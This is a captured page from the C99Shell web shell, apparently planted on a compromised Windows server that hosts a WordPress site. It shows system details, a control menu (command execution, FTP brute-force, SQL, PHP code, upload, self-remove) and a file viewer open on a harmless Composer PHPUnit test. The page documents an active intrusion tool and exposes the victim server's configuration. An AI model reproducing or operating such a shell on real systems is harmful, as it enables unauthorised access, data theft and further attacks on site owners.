!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wordpress-seo\vendor\composer\installers\tests\Composer\Installers\Test\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.44%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AsgardInstallerTest.php (1.48 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Composer\Installers\Test;

use 
Composer\Installers\AsgardInstaller;
use 
Composer\Package\Package;
use 
Composer\Composer;

class 
AsgardInstallerTest extends \PHPUnit_Framework_TestCase
{
    
/**
     * @var OctoberInstaller
     */
    
private $installer;

    public function 
setUp()
    {
        
$this->installer = new AsgardInstaller(
            new 
Package('NyanCat''4.2''4.2'),
            new 
Composer()
        );
    }

    
/**
     * @dataProvider packageNameInflectionProvider
     */
    
public function testInflectPackageVars($type$name$expected)
    {
        
$this->assertEquals(
            
$this->installer->inflectPackageVars(array('name' => $name'type' => $type)),
            array(
'name' => $expected'type' => $type)
        );
    }

    public function 
packageNameInflectionProvider()
    {
        return array(
            array(
                
'asgard-module',
                
'asgard-module',
                
'Asgard'
            
),
            array(
                
'asgard-module',
                
'blog',
                
'Blog'
            
),
            
// tests that exactly one '-theme' is cut off
            
array(
                
'asgard-theme',
                
'some-theme-theme',
                
'Some-theme',
            ),
            
// tests that names without '-theme' suffix stay valid
            
array(
                
'asgard-theme',
                
'someothertheme',
                
'Someothertheme',
            ),
        );
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--